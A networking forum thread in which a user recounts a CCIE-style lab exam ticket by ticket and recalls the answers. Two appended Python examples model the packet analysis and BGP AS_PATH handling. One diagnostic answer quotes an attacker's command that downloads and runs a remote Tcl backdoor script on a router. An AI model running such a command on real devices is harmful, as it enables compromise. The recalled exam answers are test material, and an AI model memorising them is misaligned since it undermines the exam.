View Full Version : Cleared LAB EXAM: TS1, H3Diag, H2+CFG



orowp
10-27-2018, 11:12 AM
Passed the lab on 25-Oct. (TS1, H3Diag, H2+ Config)
Here is the feedback.

TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255

Ticket2: frame relay configured on R17. Changed it to ppp.

Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.

Ticket4: Passive interface on R12.

Ticket5: Didn't get 2 traces as expected
1. Network 134.21.21.21 not advertised on R21.
2. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
3. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
4. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.

Ticket6: IPv6 neighborship (via IPv6 address) was activated in ipv4 address family on both routers.
Activated the IPv6 neighbor in ipv6 address family on both routers.

Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.

Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traces required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLAN 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3

Ticket9:
ACL on R21 was not letting DMVPN come up.
Added permit any any command in ACL on R21 to solve the issue.

Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.

Returned to ticket 5 after completing the rest. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didn't want to take risk in TS. Solved the TS carefully and checked output of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.


DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)

2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip is 0.0.0.0

3. Where is the packet captured?
--> Selected link between SW1-SW3 (used cdp filter to confirm this in packet capture).

Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request is Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victims IP)

In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1

Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installation of ransomware via backdoor.

Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. In packet capture, use filter tcp.port==1337
2. Select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note these keywords.
4. Now again change filter in capture to http.request.method==GET and follow the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword.
6. In this script, r keyword had some description like this (don't remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.

Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.

DIAG section can be hectic due to less time and a lot of attachments in each question. Don't blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get at least 4 out of 6 questions correct in order to score minimum passing score of 60%.
It would be very bad if we cleared TS and CFG and failed in DIAG :P


CFG: H2+
=======

Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB

After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time i used following command on all Sw3-6: ping 255.255.255.255 rep 2)

Sec 2.1: OSPF required in DC 65002 with:
a. Type-2 LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.

Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router IDs were missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.

Sec 2.2: same as WB. Did sec 3.1 before 2.2

Sec 2.3: same as WB, but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS routers and R9-R10 (configured eigrp on R9-R10 in 2.3 itself)

Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(This section takes more time as we need to check preconfiguration on many devices and add missing commands)

There is a question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically the better choice (No WB has this solution)

Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to their ebgp.
So I used def-info originate instead of 'neigh x.x.x.x def-ori' as that command artificially generates a default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (don't forget subnets keyword)

router bgp 65002
redis ospf 1 match int ext 2
default-info originate



Sec 2.5:
Question not very clear. So i followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001

Did conf like WB: removed 65006,added 65001, used no-prepend replace-as


Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.

Note: R57 had redistribute eigrp command in bgp. Removed it to satisfy 2.6 requirement.


Sec 2.7: Required not to use route-map, access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Don't forget to use subnets keyword while redistributing ospf into bgp (or networks will be redistributed classful, and Jacobs will not be able to reach Jamesons core networks)


Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as active and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There was a point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.

Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.

Sec 3.3: same as WB. load-sharing on Jacobs PE

Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sites should communicate via DC.

--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)


Sec 4.1: not to use deny.

Sec 4.2: same as WB.

Sec 5.1: same as WB

Sec 5.2: same as WB

Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.

I took around 5 hours to complete config section, configuring each section steadily and checking all required outputs after completing each section.
Don't hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs while copy-pasting :P)

All the best for your LAB exams.
Go, get your NUMBER :cool:
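
Added example, not from orowp's post: the same triage he describes for the TCL ticket (find the GET, find the SYN to 1337, follow both streams, read the menu) done in Python over a constructed packet list, so the logic can be checked without CloudShark. The capture and the bd2.tcl stand-in are made up for this example; the only things taken from the post are the two IPs, port 1337 and the script name. It assumes the bind-shell direction from Q1 option 2 (remote host connects to the router's port 1337), which is also the point Johnsnow raises about the SYN filter in his reply below.

```python
"""Diag ticket 2 triage in code instead of CloudShark filters.

Added example; not part of the original post. The packet records are a
constructed stand-in for a decoded capture (src, dst, sport, dport, TCP
flags, payload). bd2.tcl's real contents are not known, so SAMPLE_SCRIPT is
a made-up switch-style menu that only prints banner text.
"""
import re
from collections import defaultdict

BACKDOOR_PORT = 1337


def pkt(src, dst, sport, dport, flags="PA", payload=""):
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "flags": flags, "payload": payload}


SAMPLE_SCRIPT = """\
# constructed stand-in for bd2.tcl: a menu that only prints banners
switch -- $cmd {
  c { puts $chan "config mode" }
  r { puts $chan "Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown." }
  q { puts $chan "bye"; close $chan }
}
"""

HTTP_REQUEST = "GET /bd2.tcl HTTP/1.0\r\nHost: 10.1.1.1\r\n\r\n"
HTTP_RESPONSE = "HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n" + SAMPLE_SCRIPT

SAMPLE_CAPTURE = [  # constructed: router 10.1.1.2 fetches the script, then 10.1.1.1 connects to 1337
    pkt("10.1.1.2", "10.1.1.1", 40001, 80, "S"),
    pkt("10.1.1.1", "10.1.1.2", 80, 40001, "SA"),
    pkt("10.1.1.2", "10.1.1.1", 40001, 80, "PA", HTTP_REQUEST),
    pkt("10.1.1.1", "10.1.1.2", 80, 40001, "PA", HTTP_RESPONSE),
    pkt("10.1.1.1", "10.1.1.2", 51234, BACKDOOR_PORT, "S"),
    pkt("10.1.1.2", "10.1.1.1", BACKDOOR_PORT, 51234, "SA"),
    pkt("10.1.1.1", "10.1.1.2", 51234, BACKDOOR_PORT, "PA", "c\n"),
    pkt("10.1.1.2", "10.1.1.1", BACKDOOR_PORT, 51234, "PA", "config mode\n"),
    pkt("10.1.1.1", "10.1.1.2", 51234, BACKDOOR_PORT, "PA", "r\n"),
    pkt("10.1.1.2", "10.1.1.1", BACKDOOR_PORT, 51234, "PA", "Your router is compromised. ...\n"),
    pkt("10.1.1.1", "10.1.1.2", 51234, BACKDOOR_PORT, "PA", "q\n"),
]


def http_get_requests(packets):
    """Same as the http.request.method==GET filter: list of (packet, path, host)."""
    found = []
    for p in packets:
        m = re.match(r"GET (\S+) HTTP/1\.[01]\r\n", p["payload"])
        if m:
            h = re.search(r"\r\nHost: ([^\r\n]+)", p["payload"])
            found.append((p, m.group(1), h.group(1) if h else p["dst"]))
    return found


def first_syn_to_port(packets, port):
    """tcp.port==<port>, first SYN: whoever sent it opened the session."""
    for p in packets:
        if p["dport"] == port and p["flags"] == "S":
            return p
    return None


def follow_stream(packets, ref):
    """'Follow TCP stream' for ref's 4-tuple: payload per direction, capture order."""
    fwd = (ref["src"], ref["sport"], ref["dst"], ref["dport"])
    rev = (ref["dst"], ref["dport"], ref["src"], ref["sport"])
    streams = defaultdict(str)
    for p in packets:
        if (p["src"], p["sport"], p["dst"], p["dport"]) in (fwd, rev):
            streams[(p["src"], p["dst"])] += p["payload"]
    return dict(streams)


def menu_from_script(script):
    """One-letter commands and their banner text from a switch-style Tcl menu."""
    pat = re.compile(r'^\s*(\w)\s*\{\s*puts\s+\$\w+\s+"([^"]*)"', re.M)
    return {m.group(1): m.group(2) for m in pat.finditer(script)}


def triage(packets, port=BACKDOOR_PORT):
    get_pkt, path, host = http_get_requests(packets)[0]
    victim = get_pkt["src"]                       # the router is what pulled the script
    script_url = f"http://{host}{path}"
    body = follow_stream(packets, get_pkt)[(get_pkt["dst"], victim)]
    menu = menu_from_script(body.split("\r\n\r\n", 1)[1])
    syn = first_syn_to_port(packets, port)
    if syn is None or syn["dst"] != victim:
        raise ValueError(f"no inbound session to {victim} on port {port}")
    attacker = syn["src"]
    shell = follow_stream(packets, syn)
    sent = [c for c in shell.get((attacker, victim), "").split() if c in menu]
    return {
        "victim": victim,
        "attacker": attacker,
        "script_url": script_url,
        "tclsh_command": f"tclsh {script_url}",
        "commands_sent": sent,
        "destructive": [c for c, text in menu.items() if "meltdown" in text.lower()],
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_CAPTURE).items():
        print(f"{k}: {v}")
```

The check on the SYN's destination is the one worth keeping: if the host that fetched the script is not the one being connected to on 1337, the two captures are not the same incident and the "attacker" guess is wrong. Swap in records decoded from the real pcap and the same three answers (victim/attacker, the destructive keyword, the tclsh URL) fall out.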

orowp
10-27-2018, 11:14 AM
Additional Points (ran out of character limit 10000 in previous post :P) :

Exam day can create unwanted pressure. Don't lose focus and speed in exam time of 8 hours. Keep water and energy drink to maintain energy levels.

Don't blindly follow the WB.

Practice each TS, DIAG, CFG at least 10 times.

Try to complete TS and DIAG together within 5hrs 30 min at home.

Try to begin practice at same time as exam time (start around 8:45-9AM). This will train your mind and body for exam timings. Do this for at least 10 days before exam.

Try to avoid studying 1 day before the exam. This will increase the nervousness and increase pressure.

Go and check exam center building and its entrance gate one day before exam to avoid any last min surprises on exam day :)

When in any doubt (non-technical) during exam, immediately ask proctor rather than wasting time in solving it yourself.

Don't forget to save config on devices. As a best practice, use following commands after every config change:
end
wr

ccdp1x
10-27-2018, 06:52 PM
Great feedback.
Congrats, and enjoy your number.

proctoryon
11-01-2018, 10:28 PM
Hi,
i am preparing H2 and i have some doubts:
- in the statement, it is asked to configure between the route reflector R1 and the rest of PEs bgp neighborship using address-family ipv4. But if we configured the vrf's and mpls, i think that we should configure only the address-family vpnv4, what do you think ??
- also, to work using only address-family ipv4, it should be mandatory to use "allowas-in" on the CE's in AS65002. if we use the vpnv4, we can use as-override. what do you think ??
- is it clear on the exam ?? i am using spoto and the statement are not clear.
Thanks in advance.

ccierscisco
11-05-2018, 06:33 PM
can you share H3 Config and Gz file

orowp
11-13-2018, 06:21 AM
Hi,
i am preparing H2 and i have some doubts:
- in the statement, it is asked to configure between the route reflector R1 and the rest of PEs bgp neighborship using address-family ipv4. But if we configured the vrf's and mpls, i think that we should configure only the address-family vpnv4, what do you think ??
- also, to work using only address-family ipv4, it should be mandatory to use "allowas-in" on the CE's in AS65002. if we use the vpnv4, we can use as-override. what do you think ??
- is it clear on the exam ?? i am using spoto and the statement are not clear.
Thanks in advance.

It is clear in the exam.
Its better to configure both ipv4 and vpnv4 neighborship.

orowp
11-13-2018, 06:22 AM
can you share H3 Config and Gz file

You can find the H3 material in one of the posts in iecollection

swrong
11-29-2018, 07:37 AM
did you skip section 4.2? which is the dhcp scope question

johnspain
12-01-2018, 09:26 AM
can you send the exact link to download it please ??
thanks in advance

gkakade007
01-16-2019, 12:07 AM
Can you tell me what exactly you did in sec3.3, I didn't get that,
You just mentioned no-prepend replace-as

fampfamp01
03-22-2019, 04:31 PM
Great, thanks a lot

Johnsnow
09-01-2019, 01:44 AM
Thanks bro, you explained very well and finally i found my answer about Diag 3 TCL on your post. I think there is a typo though "b. tcp.port==1337 (Source IP in SYN packet is Victims IP)" -> I think Destination is Victim per what you had described.

Johnsnow
09-02-2019, 06:03 AM
Can you tell me what exactly you did in sec3.3, I didn't get that,
You just mentioned no-prepend replace-as

if AS number 65001 should not be in as path on R55 , R56 and R57 then use command
neighbor x.x.x.x local-as 65006 no-prepend replace-as on router R50 , R51 , R52 in bgp configuration so you will see :

*> 10.16.1.0/24 172.18.253.1 0 65006 65002 ?
*> 10.16.2.0/24 172.18.253.1 0 65006 65002 ?
*> 10.16.3.0/24 172.18.253.1 0 65006 65002 ?
*> 10.100.0.1/32 172.18.253.1 0 65006 65002 ?
*> 10.100.0.19/32 172.18.253.1 0 65006 65002 ?
...
Otherwise you'll see 65006 65001 65002
I hope it helps
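
Added example (mine, not from Johnsnow's post or any Cisco document): a small Python model of the AS_PATH rewrites behind `local-as ... no-prepend replace-as`, `allowas-in` and `as-override`, so the difference between seeing 65006 65002 and 65006 65001 65002 on R55-R57 can be reasoned through offline. The AS numbers are the thread's; the rules are the IOS behaviour as I understand it and should be confirmed on the rack.

```python
"""Model of how IOS 'neighbor ... local-as' and related knobs rewrite AS_PATH.

Added example; not from the thread or from Cisco. Assumed rules (verify on a
lab box): local-as prepends the fake AS in front of the real AS on outbound
updates; replace-as drops the real AS from that prepend; no-prepend stops the
fake AS being added to routes learned from that neighbor; allowas-in relaxes
the receiver's own-AS loop check; as-override on a PE rewrites the CE's AS
with the PE's AS before sending.
"""


def outbound_as_path(as_path, real_as, local_as=None, replace_as=False):
    """AS_PATH put on the wire toward an eBGP neighbor.
    as_path is the path in the local table, i.e. without this router's own AS."""
    if local_as is None:
        return [real_as] + list(as_path)
    if replace_as:
        return [local_as] + list(as_path)
    return [local_as, real_as] + list(as_path)


def inbound_as_path(as_path, local_as=None, no_prepend=False):
    """AS_PATH stored for a route learned from a neighbor that has local-as set."""
    if local_as is not None and not no_prepend:
        return [local_as] + list(as_path)
    return list(as_path)


def accepted(as_path, my_as, allowas_in=0):
    """eBGP loop check: drop the route if my own AS appears more times than allowed."""
    return as_path.count(my_as) <= allowas_in


def as_override(as_path, ce_as, pe_as):
    """PE-side 'neighbor ... as-override' toward a CE in ce_as."""
    return [pe_as if asn == ce_as else asn for asn in as_path]


# Sec 3.3 as Johnsnow describes it: Jacobs PE R50 (real AS 65001) peers with CE R55
# using local-as 65006 and advertises a DC prefix whose path is already [65002].
def jacobs_ce_view(replace_as):
    return outbound_as_path([65002], real_as=65001, local_as=65006, replace_as=replace_as)


# Sec 2.4: a CE in AS 65002 learns another 65002 site's prefix through the 65001
# core. Without allowas-in the loop check drops it; with as-override on the PE
# the path no longer carries 65002 at all and the check stays intact.
def ce_sees_remote_site(allowas_in=0, pe_as_override=False):
    pe_path = [65002]                    # path held on the PE for the remote site's prefix
    if pe_as_override:
        pe_path = as_override(pe_path, ce_as=65002, pe_as=65001)
    on_wire = outbound_as_path(pe_path, real_as=65001)
    return on_wire, accepted(on_wire, my_as=65002, allowas_in=allowas_in)


if __name__ == "__main__":
    print("replace-as        :", jacobs_ce_view(True))    # [65006, 65002]
    print("without replace-as:", jacobs_ce_view(False))   # [65006, 65001, 65002]
    print("CE, default       :", ce_sees_remote_site())
    print("CE, allowas-in 1  :", ce_sees_remote_site(allowas_in=1))
    print("CE, as-override   :", ce_sees_remote_site(pe_as_override=True))
```

The caveat worth carrying out of the lab: `allowas-in` switches off the own-AS loop check on the CE, so a prefix that leaks back toward a site is no longer rejected on AS_PATH grounds. Where the design allows, `as-override` on the PE solves the same reachability problem while leaving the CE's check in place; if `allowas-in` is the requirement, give it the smallest count that works.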